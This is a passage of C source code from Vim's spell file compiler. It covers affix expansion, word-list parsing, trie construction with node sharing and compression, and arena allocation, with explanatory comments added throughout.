retval = FAIL;
}
vim_free(pc);
}
if (duplicate > 0)
smsg((char_u *)_("%d duplicate word(s) in %s"), duplicate, fname);
if (spin->si_ascii && non_ascii > 0)
smsg((char_u *)_("Ignored %d word(s) with non-ASCII characters in %s"),
non_ascii, fname);
hash_clear(&ht);
fclose(fd);
return retval;
}
/*
* Check for affix flags in "afflist" that are turned into word flags.
* Return WF_ flags.
*/
static int
get_affix_flags(afffile_T *affile, char_u *afflist)
{
int flags = 0;
if (affile->af_keepcase != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_keepcase))
flags |= WF_KEEPCAP | WF_FIXCAP;
if (affile->af_rare != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_rare))
flags |= WF_RARE;
if (affile->af_bad != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_bad))
flags |= WF_BANNED;
if (affile->af_needcomp != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_needcomp))
flags |= WF_NEEDCOMP;
if (affile->af_comproot != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_comproot))
flags |= WF_COMPROOT;
if (affile->af_nosuggest != 0 && flag_in_afflist(
affile->af_flagtype, afflist, affile->af_nosuggest))
flags |= WF_NOSUGGEST;
return flags;
}
/*
* Get the list of prefix IDs from the affix list "afflist".
* Used for PFXPOSTPONE.
* Put the resulting flags in "store_afflist[MAXWLEN]" with a terminating NUL
* and return the number of affixes.
*/
static int
get_pfxlist(
afffile_T *affile,
char_u *afflist,
char_u *store_afflist)
{
char_u *p;
char_u *prevp;
int cnt = 0;
int id;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
for (p = afflist; *p != NUL; )
{
prevp = p;
if (get_affitem(affile->af_flagtype, &p) != 0)
{
/* A flag is a postponed prefix flag if it appears in "af_pref"
* and its ID is not zero. */
vim_strncpy(key, prevp, p - prevp);
hi = hash_find(&affile->af_pref, key);
if (!HASHITEM_EMPTY(hi))
{
id = HI2AH(hi)->ah_newID;
if (id != 0)
store_afflist[cnt++] = id;
}
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
store_afflist[cnt] = NUL;
return cnt;
}
/*
* Get the list of compound IDs from the affix list "afflist" that are used
* for compound words.
* Puts the flags in "store_afflist[]".
*/
static void
get_compflags(
afffile_T *affile,
char_u *afflist,
char_u *store_afflist)
{
char_u *p;
char_u *prevp;
int cnt = 0;
char_u key[AH_KEY_LEN];
hashitem_T *hi;
for (p = afflist; *p != NUL; )
{
prevp = p;
if (get_affitem(affile->af_flagtype, &p) != 0)
{
/* A flag is a compound flag if it appears in "af_comp". */
vim_strncpy(key, prevp, p - prevp);
hi = hash_find(&affile->af_comp, key);
if (!HASHITEM_EMPTY(hi))
store_afflist[cnt++] = HI2CI(hi)->ci_newID;
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
store_afflist[cnt] = NUL;
}
/*
* Apply affixes to a word and store the resulting words.
* "ht" is the hashtable with affentry_T that need to be applied, either
* prefixes or suffixes.
* "xht", when not NULL, is the prefix hashtable, to be used additionally on
* the resulting words for combining affixes.
*
* Returns FAIL when out of memory.
*/
static int
store_aff_word(
spellinfo_T *spin, /* spell info */
char_u *word, /* basic word start */
char_u *afflist, /* list of names of supported affixes */
afffile_T *affile,
hashtab_T *ht,
hashtab_T *xht,
int condit, /* CONDIT_SUF et al. */
int flags, /* flags for the word */
char_u *pfxlist, /* list of prefix IDs */
int pfxlen) /* nr of flags in "pfxlist" for prefixes, rest
* is compound flags */
{
int todo;
hashitem_T *hi;
affheader_T *ah;
affentry_T *ae;
char_u newword[MAXWLEN];
int retval = OK;
int i, j;
char_u *p;
int use_flags;
char_u *use_pfxlist;
int use_pfxlen;
int need_affix;
char_u store_afflist[MAXWLEN];
char_u pfx_pfxlist[MAXWLEN];
size_t wordlen = STRLEN(word);
int use_condit;
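/* For every affix header whose flag appears in "afflist", and for every
* entry of that header whose condition matches, build the affixed word and
* store it; then recursively try adding a suffix and/or a prefix to it. */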
todo = (int)ht->ht_used;
for (hi = ht->ht_array; todo > 0 && retval == OK; ++hi)
{
if (!HASHITEM_EMPTY(hi))
{
--todo;
ah = HI2AH(hi);
/* Check that the affix combines, if required, and that the word
* supports this affix. */
if (((condit & CONDIT_COMB) == 0 || ah->ah_combine)
&& flag_in_afflist(affile->af_flagtype, afflist,
ah->ah_flag))
{
/* Loop over all affix entries with this name. */
for (ae = ah->ah_first; ae != NULL; ae = ae->ae_next)
{
/* Check the condition. It's not logical to match case
* here, but it is required for compatibility with
* Myspell.
* Another requirement from Myspell is that the chop
* string is shorter than the word itself.
* For prefixes, when "PFXPOSTPONE" was used, only do
* prefixes with a chop string and/or flags.
* When a previously added affix had CIRCUMFIX this one
* must have it too, if it had not then this one must not
* have one either. */
if ((xht != NULL || !affile->af_pfxpostpone
|| ae->ae_chop != NULL
|| ae->ae_flags != NULL)
&& (ae->ae_chop == NULL
|| STRLEN(ae->ae_chop) < wordlen)
&& (ae->ae_prog == NULL
|| vim_regexec_prog(&ae->ae_prog, FALSE,
word, (colnr_T)0))
&& (((condit & CONDIT_CFIX) == 0)
== ((condit & CONDIT_AFF) == 0
|| ae->ae_flags == NULL
|| !flag_in_afflist(affile->af_flagtype,
ae->ae_flags, affile->af_circumfix))))
{
/* Match. Remove the chop and add the affix. */
if (xht == NULL)
{
/* prefix: chop/add at the start of the word */
if (ae->ae_add == NULL)
*newword = NUL;
else
vim_strncpy(newword, ae->ae_add, MAXWLEN - 1);
p = word;
if (ae->ae_chop != NULL)
{
/* Skip chop string. */
#ifdef FEAT_MBYTE
if (has_mbyte)
{
i = mb_charlen(ae->ae_chop);
for ( ; i > 0; --i)
mb_ptr_adv(p);
}
else
#endif
p += STRLEN(ae->ae_chop);
}
STRCAT(newword, p);
}
else
{
/* suffix: chop/add at the end of the word */
vim_strncpy(newword, word, MAXWLEN - 1);
if (ae->ae_chop != NULL)
{
/* Remove chop string. */
p = newword + STRLEN(newword);
i = (int)MB_CHARLEN(ae->ae_chop);
for ( ; i > 0; --i)
mb_ptr_back(newword, p);
*p = NUL;
}
if (ae->ae_add != NULL)
STRCAT(newword, ae->ae_add);
}
use_flags = flags;
use_pfxlist = pfxlist;
use_pfxlen = pfxlen;
need_affix = FALSE;
use_condit = condit | CONDIT_COMB | CONDIT_AFF;
if (ae->ae_flags != NULL)
{
/* Extract flags from the affix list. */
use_flags |= get_affix_flags(affile, ae->ae_flags);
if (affile->af_needaffix != 0 && flag_in_afflist(
affile->af_flagtype, ae->ae_flags,
affile->af_needaffix))
need_affix = TRUE;
/* When there is a CIRCUMFIX flag the other affix
* must also have it and we don't add the word
* with one affix. */
if (affile->af_circumfix != 0 && flag_in_afflist(
affile->af_flagtype, ae->ae_flags,
affile->af_circumfix))
{
use_condit |= CONDIT_CFIX;
if ((condit & CONDIT_CFIX) == 0)
need_affix = TRUE;
}
if (affile->af_pfxpostpone
|| spin->si_compflags != NULL)
{
if (affile->af_pfxpostpone)
/* Get prefix IDS from the affix list. */
use_pfxlen = get_pfxlist(affile,
ae->ae_flags, store_afflist);
else
use_pfxlen = 0;
use_pfxlist = store_afflist;
/* Combine the prefix IDs. Avoid adding the
* same ID twice. */
for (i = 0; i < pfxlen; ++i)
{
for (j = 0; j < use_pfxlen; ++j)
if (pfxlist[i] == use_pfxlist[j])
break;
if (j == use_pfxlen)
use_pfxlist[use_pfxlen++] = pfxlist[i];
}
if (spin->si_compflags != NULL)
/* Get compound IDS from the affix list. */
get_compflags(affile, ae->ae_flags,
use_pfxlist + use_pfxlen);
/* Combine the list of compound flags.
* Concatenate them to the prefix IDs list.
* Avoid adding the same ID twice. */
for (i = pfxlen; pfxlist[i] != NUL; ++i)
{
for (j = use_pfxlen;
use_pfxlist[j] != NUL; ++j)
if (pfxlist[i] == use_pfxlist[j])
break;
if (use_pfxlist[j] == NUL)
{
use_pfxlist[j++] = pfxlist[i];
use_pfxlist[j] = NUL;
}
}
}
}
/* Obey a "COMPOUNDFORBIDFLAG" of the affix: don't
* use the compound flags. */
if (use_pfxlist != NULL && ae->ae_compforbid)
{
vim_strncpy(pfx_pfxlist, use_pfxlist, use_pfxlen);
use_pfxlist = pfx_pfxlist;
}
/* When there are postponed prefixes... */
if (spin->si_prefroot != NULL
&& spin->si_prefroot->wn_sibling != NULL)
{
/* ... add a flag to indicate an affix was used. */
use_flags |= WF_HAS_AFF;
/* ... don't use a prefix list if combining
* affixes is not allowed. But do use the
* compound flags after them. */
if (!ah->ah_combine && use_pfxlist != NULL)
use_pfxlist += use_pfxlen;
}
/* When compounding is supported and there is no
* "COMPOUNDPERMITFLAG" then forbid compounding on the
* side where the affix is applied. */
if (spin->si_compflags != NULL && !ae->ae_comppermit)
{
if (xht != NULL)
use_flags |= WF_NOCOMPAFT;
else
use_flags |= WF_NOCOMPBEF;
}
/* Store the modified word. */
if (store_word(spin, newword, use_flags,
spin->si_region, use_pfxlist,
need_affix) == FAIL)
retval = FAIL;
/* When a prefix or a first suffix was added and the affix has
* flags, we may add a(nother) suffix. RECURSIVE! */
if ((condit & CONDIT_SUF) && ae->ae_flags != NULL)
if (store_aff_word(spin, newword, ae->ae_flags,
affile, &affile->af_suff, xht,
use_condit & (xht == NULL
? ~0 : ~CONDIT_SUF),
use_flags, use_pfxlist, pfxlen) == FAIL)
retval = FAIL;
/* When a suffix was added and combining is allowed, also try
* adding a prefix. Do this both for the word flags and for
* the affix flags. RECURSIVE! */
if (xht != NULL && ah->ah_combine)
{
if (store_aff_word(spin, newword,
afflist, affile,
xht, NULL, use_condit,
use_flags, use_pfxlist,
pfxlen) == FAIL
|| (ae->ae_flags != NULL
&& store_aff_word(spin, newword,
ae->ae_flags, affile,
xht, NULL, use_condit,
use_flags, use_pfxlist,
pfxlen) == FAIL))
retval = FAIL;
}
}
}
}
}
}
return retval;
}
/*
* Read a file with a list of words.
*/
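/*
 * Illustrative sketch (editorial addition, not part of the original source):
 * a word file as parsed by spell_read_wordfile() below.  '#' starts a
 * comment line, "/encoding=" and "/regions=" lines set options, and an
 * optional "/" after a word carries flags: '=' keep-case, '!' bad word,
 * '?' rare word, digits select regions.  The words themselves are made up:
 *
 *	# example word list
 *	/encoding=latin1
 *	/regions=usca
 *	blob
 *	ain't/!
 *	colour/2
 *	iPod/=
 */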
static int
spell_read_wordfile(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
long lnum = 0;
char_u rline[MAXLINELEN];
char_u *line;
char_u *pc = NULL;
char_u *p;
int l;
int retval = OK;
int did_word = FALSE;
int non_ascii = 0;
int flags;
int regionmask;
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
vim_snprintf((char *)IObuff, IOSIZE, _("Reading word file %s ..."), fname);
spell_message(spin, IObuff);
/*
* Read all the lines in the file one by one.
*/
while (!vim_fgets(rline, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
/* Skip comment lines. */
if (*rline == '#')
continue;
/* Remove CR, LF and white space from the end. */
l = (int)STRLEN(rline);
while (l > 0 && rline[l - 1] <= ' ')
--l;
if (l == 0)
continue; /* empty or blank line */
rline[l] = NUL;
/* Convert from "/encoding={encoding}" to 'encoding' when needed. */
vim_free(pc);
#ifdef FEAT_MBYTE
if (spin->si_conv.vc_type != CONV_NONE)
{
pc = string_convert(&spin->si_conv, rline, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, rline);
continue;
}
line = pc;
}
else
#endif
{
pc = NULL;
line = rline;
}
if (*line == '/')
{
++line;
if (STRNCMP(line, "encoding=", 9) == 0)
{
if (spin->si_conv.vc_type != CONV_NONE)
smsg((char_u *)_("Duplicate /encoding= line ignored in %s line %d: %s"),
fname, lnum, line - 1);
else if (did_word)
smsg((char_u *)_("/encoding= line after word ignored in %s line %d: %s"),
fname, lnum, line - 1);
else
{
#ifdef FEAT_MBYTE
char_u *enc;
/* Setup for conversion to 'encoding'. */
line += 9;
enc = enc_canonize(line);
if (enc != NULL && !spin->si_ascii
&& convert_setup(&spin->si_conv, enc,
p_enc) == FAIL)
smsg((char_u *)_("Conversion in %s not supported: from %s to %s"),
fname, line, p_enc);
vim_free(enc);
spin->si_conv.vc_fail = TRUE;
#else
smsg((char_u *)_("Conversion in %s not supported"), fname);
#endif
}
continue;
}
if (STRNCMP(line, "regions=", 8) == 0)
{
if (spin->si_region_count > 1)
smsg((char_u *)_("Duplicate /regions= line ignored in %s line %d: %s"),
fname, lnum, line);
else
{
line += 8;
if (STRLEN(line) > 16)
smsg((char_u *)_("Too many regions in %s line %d: %s"),
fname, lnum, line);
else
{
spin->si_region_count = (int)STRLEN(line) / 2;
STRCPY(spin->si_region_name, line);
/* Adjust the mask for a word valid in all regions. */
spin->si_region = (1 << spin->si_region_count) - 1;
}
}
continue;
}
smsg((char_u *)_("/ line ignored in %s line %d: %s"),
fname, lnum, line - 1);
continue;
}
flags = 0;
regionmask = spin->si_region;
/* Check for flags and region after a slash. */
p = vim_strchr(line, '/');
if (p != NULL)
{
*p++ = NUL;
while (*p != NUL)
{
if (*p == '=') /* keep-case word */
flags |= WF_KEEPCAP | WF_FIXCAP;
else if (*p == '!') /* Bad, bad, wicked word. */
flags |= WF_BANNED;
else if (*p == '?') /* Rare word. */
flags |= WF_RARE;
else if (VIM_ISDIGIT(*p)) /* region number(s) */
{
if ((flags & WF_REGION) == 0) /* first one */
regionmask = 0;
flags |= WF_REGION;
l = *p - '0';
if (l == 0 || l > spin->si_region_count)  /* 0 would shift by -1 below */
{
smsg((char_u *)_("Invalid region nr in %s line %d: %s"),
fname, lnum, p);
break;
}
regionmask |= 1 << (l - 1);
}
else
{
smsg((char_u *)_("Unrecognized flags in %s line %d: %s"),
fname, lnum, p);
break;
}
++p;
}
}
/* Skip non-ASCII words when "spin->si_ascii" is TRUE. */
if (spin->si_ascii && has_non_ascii(line))
{
++non_ascii;
continue;
}
/* Normal word: store it. */
if (store_word(spin, line, flags, regionmask, NULL, FALSE) == FAIL)
{
retval = FAIL;
break;
}
did_word = TRUE;
}
vim_free(pc);
fclose(fd);
if (spin->si_ascii && non_ascii > 0)
{
vim_snprintf((char *)IObuff, IOSIZE,
_("Ignored %d words with non-ASCII characters"), non_ascii);
spell_message(spin, IObuff);
}
return retval;
}
/*
* Get part of an sblock_T, "len" bytes long.
* This avoids calling free() for every little struct we use (and keeping
* track of them).
* The memory is cleared to all zeros.
* Returns NULL when out of memory.
*/
static void *
getroom(
spellinfo_T *spin,
size_t len, /* length needed */
int align) /* align for pointer */
{
char_u *p;
sblock_T *bl = spin->si_blocks;
if (align && bl != NULL)
/* Round size up for alignment. On some systems structures need to be
* aligned to the size of a pointer (e.g., SPARC). */
bl->sb_used = (bl->sb_used + sizeof(char *) - 1)
& ~(sizeof(char *) - 1);
if (bl == NULL || bl->sb_used + len > SBLOCKSIZE)
{
if (len >= SBLOCKSIZE)
bl = NULL;
else
/* Allocate a block of memory. It is not freed until much later. */
bl = (sblock_T *)alloc_clear(
(unsigned)(sizeof(sblock_T) + SBLOCKSIZE));
if (bl == NULL)
{
if (!spin->si_did_emsg)
{
EMSG(_("E845: Insufficient memory, word list will be incomplete"));
spin->si_did_emsg = TRUE;
}
return NULL;
}
bl->sb_next = spin->si_blocks;
spin->si_blocks = bl;
bl->sb_used = 0;
++spin->si_blocks_cnt;
}
p = bl->sb_data + bl->sb_used;
bl->sb_used += (int)len;
return p;
}
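/*
 * Usage sketch (editorial addition): getroom() above is a simple arena
 * allocator; results are never freed one by one, only all at once with
 * free_blocks(spin->si_blocks).  The struct name "demo_item_T" below is
 * hypothetical:
 *
 *	demo_item_T *item;
 *
 *	item = (demo_item_T *)getroom(spin, sizeof(demo_item_T), TRUE);
 *	if (item != NULL)
 *	    item->name = getroom_save(spin, name);
 *
 * getroom_save(), defined just below, copies a string into the same arena.
 */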
/*
* Make a copy of a string into memory allocated with getroom().
* Returns NULL when out of memory.
*/
static char_u *
getroom_save(spellinfo_T *spin, char_u *s)
{
char_u *sc;
sc = (char_u *)getroom(spin, STRLEN(s) + 1, FALSE);
if (sc != NULL)
STRCPY(sc, s);
return sc;
}
/*
* Free the list of allocated sblock_T.
*/
static void
free_blocks(sblock_T *bl)
{
sblock_T *next;
while (bl != NULL)
{
next = bl->sb_next;
vim_free(bl);
bl = next;
}
}
/*
* Allocate the root of a word tree.
* Returns NULL when out of memory.
*/
static wordnode_T *
wordtree_alloc(spellinfo_T *spin)
{
return (wordnode_T *)getroom(spin, sizeof(wordnode_T), TRUE);
}
/*
* Store a word in the tree(s).
* Always store it in the case-folded tree. For a keep-case word this is
* useful when the word can also be used with all caps (no WF_FIXCAP flag) and
* used to find suggestions.
* For a keep-case word also store it in the keep-case tree.
* When "pfxlist" is not NULL store the word for each postponed prefix ID and
* compound flag.
*/
static int
store_word(
spellinfo_T *spin,
char_u *word,
int flags, /* extra flags, WF_BANNED */
int region, /* supported region(s) */
char_u *pfxlist, /* list of prefix IDs or NULL */
int need_affix) /* only store word with affix ID */
{
int len = (int)STRLEN(word);
int ct = captype(word, word + len);
char_u foldword[MAXWLEN];
int res = OK;
char_u *p;
(void)spell_casefold(word, len, foldword, MAXWLEN);
for (p = pfxlist; res == OK; ++p)
{
if (!need_affix || (p != NULL && *p != NUL))
res = tree_add_word(spin, foldword, spin->si_foldroot, ct | flags,
region, p == NULL ? 0 : *p);
if (p == NULL || *p == NUL)
break;
}
++spin->si_foldwcount;
if (res == OK && (ct == WF_KEEPCAP || (flags & WF_KEEPCAP)))
{
for (p = pfxlist; res == OK; ++p)
{
if (!need_affix || (p != NULL && *p != NUL))
res = tree_add_word(spin, word, spin->si_keeproot, flags,
region, p == NULL ? 0 : *p);
if (p == NULL || *p == NUL)
break;
}
++spin->si_keepwcount;
}
return res;
}
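/*
 * Worked example (editorial addition): when "pfxlist" holds two postponed
 * prefix IDs, the loops in store_word() above add the case-folded word to
 * si_foldroot twice, once per affix ID.  If the word is keep-case
 * (WF_KEEPCAP) the original spelling is also added to si_keeproot, again
 * once per affix ID.
 */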
/*
* Add word "word" to a word tree at "root".
* When "flags" < 0 we are adding to the prefix tree where "flags" is used for
* "rare" and "region" is the condition nr.
* Returns FAIL when out of memory.
*/
static int
tree_add_word(
spellinfo_T *spin,
char_u *word,
wordnode_T *root,
int flags,
int region,
int affixID)
{
wordnode_T *node = root;
wordnode_T *np;
wordnode_T *copyp, **copyprev;
wordnode_T **prev = NULL;
int i;
/* Add each byte of the word to the tree, including the NUL at the end. */
for (i = 0; ; ++i)
{
/* When there is more than one reference to this node we need to make
* a copy, so that we can modify it. Copy the whole list of siblings
* (we don't optimize for a partly shared list of siblings). */
if (node != NULL && node->wn_refs > 1)
{
--node->wn_refs;
copyprev = prev;
for (copyp = node; copyp != NULL; copyp = copyp->wn_sibling)
{
/* Allocate a new node and copy the info. */
np = get_wordnode(spin);
if (np == NULL)
return FAIL;
np->wn_child = copyp->wn_child;
if (np->wn_child != NULL)
++np->wn_child->wn_refs; /* child gets extra ref */
np->wn_byte = copyp->wn_byte;
if (np->wn_byte == NUL)
{
np->wn_flags = copyp->wn_flags;
np->wn_region = copyp->wn_region;
np->wn_affixID = copyp->wn_affixID;
}
/* Link the new node in the list, there will be one ref. */
np->wn_refs = 1;
if (copyprev != NULL)
*copyprev = np;
copyprev = &np->wn_sibling;
/* Let "node" point to the head of the copied list. */
if (copyp == node)
node = np;
}
}
/* Look for the sibling that has the same character. They are sorted
* on byte value, thus stop searching when a sibling is found with a
* higher byte value. For zero bytes (end of word) the sorting is
* done on flags and then on affixID. */
while (node != NULL
&& (node->wn_byte < word[i]
|| (node->wn_byte == NUL
&& (flags < 0
? node->wn_affixID < (unsigned)affixID
: (node->wn_flags < (unsigned)(flags & WN_MASK)
|| (node->wn_flags == (flags & WN_MASK)
&& (spin->si_sugtree
? (node->wn_region & 0xffff) < region
: node->wn_affixID
< (unsigned)affixID)))))))
{
prev = &node->wn_sibling;
node = *prev;
}
if (node == NULL
|| node->wn_byte != word[i]
|| (word[i] == NUL
&& (flags < 0
|| spin->si_sugtree
|| node->wn_flags != (flags & WN_MASK)
|| node->wn_affixID != affixID)))
{
/* Allocate a new node. */
np = get_wordnode(spin);
if (np == NULL)
return FAIL;
np->wn_byte = word[i];
/* If "node" is NULL this is a new child or the end of the sibling
* list: ref count is one. Otherwise use ref count of sibling and
* make ref count of sibling one (matters when inserting in front
* of the list of siblings). */
if (node == NULL)
np->wn_refs = 1;
else
{
np->wn_refs = node->wn_refs;
node->wn_refs = 1;
}
if (prev != NULL)
*prev = np;
np->wn_sibling = node;
node = np;
}
if (word[i] == NUL)
{
node->wn_flags = flags;
node->wn_region |= region;
node->wn_affixID = affixID;
break;
}
prev = &node->wn_child;
node = *prev;
}
#ifdef SPELL_PRINTTREE
smsg((char_u *)"Added \"%s\"", word);
spell_print_tree(root->wn_sibling);
#endif
/* count nr of words added since last message */
++spin->si_msg_count;
if (spin->si_compress_cnt > 1)
{
if (--spin->si_compress_cnt == 1)
/* Did enough words to lower the block count limit. */
spin->si_blocks_cnt += compress_inc;
}
/*
* When we have allocated lots of memory we need to compress the word tree
* to free up some room. But compression is slow, and we might actually
* need that room, thus only compress in the following situations:
* 1. When not compressed before (si_compress_cnt == 0): when using
* "compress_start" blocks.
* 2. When compressed before and used "compress_inc" blocks before
* adding "compress_added" words (si_compress_cnt > 1).
* 3. When compressed before, added "compress_added" words
* (si_compress_cnt == 1) and the number of free nodes drops below the
* maximum word length.
*/
#ifndef SPELL_COMPRESS_ALLWAYS
if (spin->si_compress_cnt == 1
? spin->si_free_count < MAXWLEN
: spin->si_blocks_cnt >= compress_start)
#endif
{
/* Decrement the block counter. The effect is that we compress again
* when the freed up room has been used and another "compress_inc"
* blocks have been allocated. Unless "compress_added" words have
* been added, then the limit is put back again. */
spin->si_blocks_cnt -= compress_inc;
spin->si_compress_cnt = compress_added;
if (spin->si_verbose)
{
msg_start();
msg_puts((char_u *)_(msg_compressing));
msg_clr_eos();
msg_didout = FALSE;
msg_col = 0;
out_flush();
}
/* Compress both trees. Either they both have many nodes, which makes
* compression useful, or one of them is small, which means
* compression goes fast. But when filling the soundfold word tree
* there is no keep-case tree. */
wordtree_compress(spin, spin->si_foldroot);
if (affixID >= 0)
wordtree_compress(spin, spin->si_keeproot);
}
return OK;
}
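/*
 * Illustrative sketch (editorial addition): after tree_add_word() has added
 * "an" and "and" to a tree, it looks roughly like this.  Each level is a
 * sibling list sorted on byte value; the NUL sibling (which sorts first)
 * marks the end of a word and carries wn_flags, wn_region and wn_affixID:
 *
 *	root -> 'a' -> 'n' -> NUL   (end of "an")
 *	                      'd' -> NUL   (end of "and")
 */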
/*
* Get a wordnode_T, either from the list of previously freed nodes or
* allocate a new one.
* Returns NULL when out of memory.
*/
static wordnode_T *
get_wordnode(spellinfo_T *spin)
{
wordnode_T *n;
if (spin->si_first_free == NULL)
n = (wordnode_T *)getroom(spin, sizeof(wordnode_T), TRUE);
else
{
n = spin->si_first_free;
spin->si_first_free = n->wn_child;
vim_memset(n, 0, sizeof(wordnode_T));
--spin->si_free_count;
}
#ifdef SPELL_PRINTTREE
if (n != NULL)
n->wn_nr = ++spin->si_wordnode_nr;
#endif
return n;
}
/*
* Decrement the reference count on a node (which is the head of a list of
* siblings). If the reference count becomes zero free the node and its
* siblings.
* Returns the number of nodes actually freed.
*/
static int
deref_wordnode(spellinfo_T *spin, wordnode_T *node)
{
wordnode_T *np;
int cnt = 0;
if (--node->wn_refs == 0)
{
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_child != NULL)
cnt += deref_wordnode(spin, np->wn_child);
free_wordnode(spin, np);
++cnt;
}
++cnt; /* length field */
}
return cnt;
}
/*
* Free a wordnode_T for re-use later.
* Only the "wn_child" field becomes invalid.
*/
static void
free_wordnode(spellinfo_T *spin, wordnode_T *n)
{
n->wn_child = spin->si_first_free;
spin->si_first_free = n;
++spin->si_free_count;
}
/*
* Compress a tree: find tails that are identical and can be shared.
*/
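/*
 * Illustrative example (editorial addition): after adding "bread" and
 * "tread", the child lists below 'b' and 't' are identical
 * ('r' -> 'e' -> 'a' -> 'd' -> NUL with the same flags).  node_compress()
 * below finds such duplicates through a hash table and makes both parents
 * point at one shared copy, which is what keeps the word tree compact.
 */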
static void
wordtree_compress(spellinfo_T *spin, wordnode_T *root)
{
hashtab_T ht;
int n;
int tot = 0;
int perc;
/* Skip the root itself, it's not actually used. The first sibling is the
* start of the tree. */
if (root->wn_sibling != NULL)
{
hash_init(&ht);
n = node_compress(spin, root->wn_sibling, &ht, &tot);
#ifndef SPELL_PRINTTREE
if (spin->si_verbose || p_verbose > 2)
#endif
{
if (tot > 1000000)
perc = (tot - n) / (tot / 100);
else if (tot == 0)
perc = 0;
else
perc = (tot - n) * 100 / tot;
vim_snprintf((char *)IObuff, IOSIZE,
_("Compressed %d of %d nodes; %d (%d%%) remaining"),
n, tot, tot - n, perc);
spell_message(spin, IObuff);
}
#ifdef SPELL_PRINTTREE
spell_print_tree(root->wn_sibling);
#endif
hash_clear(&ht);
}
}
/*
* Compress a node, its siblings and its children, depth first.
* Returns the number of compressed nodes.
*/
static int
node_compress(
spellinfo_T *spin,
wordnode_T *node,
hashtab_T *ht,
int *tot) /* total count of nodes before compressing,
incremented while going through the tree */
{
wordnode_T *np;
wordnode_T *tp;
wordnode_T *child;
hash_T hash;
hashitem_T *hi;
int len = 0;
unsigned nr, n;
int compressed = 0;
/*
* Go through the list of siblings. Compress each child and then try
* finding an identical child to replace it.
* Note that with "child" we mean not just the node that is pointed to,
* but the whole list of siblings of which the child node is the first.
*/
for (np = node; np != NULL && !got_int; np = np->wn_sibling)
{
++len;
if ((child = np->wn_child) != NULL)
{
/* Compress the child first. This fills hashkey. */
compressed += node_compress(spin, child, ht, tot);
/* Try to find an identical child. */
hash = hash_hash(child->wn_u1.hashkey);
hi = hash_lookup(ht, child->wn_u1.hashkey, hash);
if (!HASHITEM_EMPTY(hi))
{
/* There are children we encountered before with a hash value
* identical to the current child. Now check if there is one
* that is really identical. */
for (tp = HI2WN(hi); tp != NULL; tp = tp->wn_u2.next)
if (node_equal(child, tp))
{
/* Found one! Now use that child in place of the
* current one. This means the current child and all
* its siblings are unlinked from the tree. */
++tp->wn_refs;
compressed += deref_wordnode(spin, child);
np->wn_child = tp;
break;
}
if (tp == NULL)
{
/* No other child with this hash value equals the child of
* the node, add it to the linked list after the first
* item. */
tp = HI2WN(hi);
child->wn_u2.next = tp->wn_u2.next;
tp->wn_u2.next = child;
}
}
else
/* No other child has this hash value, add it to the
* hashtable. */
hash_add_item(ht, hi, child->wn_u1.hashkey, hash);
}
}
*tot += len + 1; /* add one for the node that stores the length */
/*
* Make a hash key for the node and its siblings, so that we can quickly
* find a lookalike node. This must be done after compressing the sibling
* list, otherwise the hash key would become invalid by the compression.
*/
node->wn_u1.hashkey[0] = len;
nr = 0;
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_byte == NUL)
/* end node: use wn_flags, wn_region and wn_affixID */
n = np->wn_flags + (np->wn_region << 8) + (np->wn_affixID << 16);
else
/* byte node: use the byte value and the child pointer */
n = (unsigned)(np->wn_byte + ((long_u)np->wn_child << 8));
nr = nr * 101 + n;
}
/* Avoid NUL bytes, it terminates the hash key. */
n = nr & 0xff;
node->wn_u1.hashkey[1] = n == 0 ? 1 : n;
n = (nr >> 8) & 0xff;
node->wn_u1.hashkey[2] = n == 0 ? 1 : n;
n = (nr >> 16) & 0xff;
node->wn_u1.hashkey[3] = n == 0 ? 1 : n;
n = (nr >> 24) & 0xff;
node->wn_u1.hashkey[4] = n == 0 ? 1 : n;
node->wn_u1.hashkey[5] = NUL;
/* Check for CTRL-C pressed now and then. */
fast_breakcheck();
return compressed;
}
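/*
 * Worked example (editorial addition): the hash key built above is 6 bytes:
 * hashkey[0] is the sibling count, hashkey[1..4] are the four bytes of the
 * rolling hash "nr" with zero bytes replaced by 1 (a NUL would end the key
 * too early), and hashkey[5] is the terminating NUL.  Two sibling lists are
 * only shared when these keys match and node_equal() confirms they are
 * really identical.
 */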
/*
* Return TRUE when two nodes have identical siblings and children.
*/
static int
node_equal(wordnode_T *n1, wordnode_T *n2)
{
wordnode_T *p1;
wordnode_T *p2;
for (p1 = n1, p2 = n2; p1 != NULL && p2 != NULL;
p1 = p1->wn_sibling, p2 = p2->wn_sibling)
if (p1->wn_byte != p2->wn_byte
|| (p1->wn_byte == NUL
? (p1->wn_flags != p2->wn_flags
|| p1->wn_region != p2->wn_region
|| p1->wn_affixID != p2->wn_affixID)
: (p1->wn_child != p2->wn_child)))
break;
return p1 == NULL && p2 == NULL;
}
static int
#ifdef __BORLANDC__
_RTLENTRYF
#endif
rep_compare(const void *s1, const void *s2);
/*
* Function given to qsort() to sort the REP items on "from" string.
*/
static int
#ifdef __BORLANDC__
_RTLENTRYF
#endif
rep_compare(const void *s1, const void *s2)
{
fromto_T *p1 = (fromto_T *)s1;
fromto_T *p2 = (fromto_T *)s2;
return STRCMP(p1->ft_from, p2->ft_from);
}
/*
* Write the Vim .spl file "fname".
* Return FAIL or OK.
*/
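/*
 * Layout sketch (editorial addition), matching the order of the code below:
 *
 *	<HEADER>     <fileID> <versionnr>
 *	<SECTIONS>   zero or more of <sectionID> <sectionflags> <sectionlen>
 *	             <sectiondata>, ended by the SN_END byte
 *	<LWORDTREE>  case-folded word tree
 *	<KWORDTREE>  keep-case word tree
 *	<PREFIXTREE> tree with postponed prefixes
 */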
static int
write_vim_spell(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
int regionmask;
int round;
wordnode_T *tree;
int nodecount;
int i;
int l;
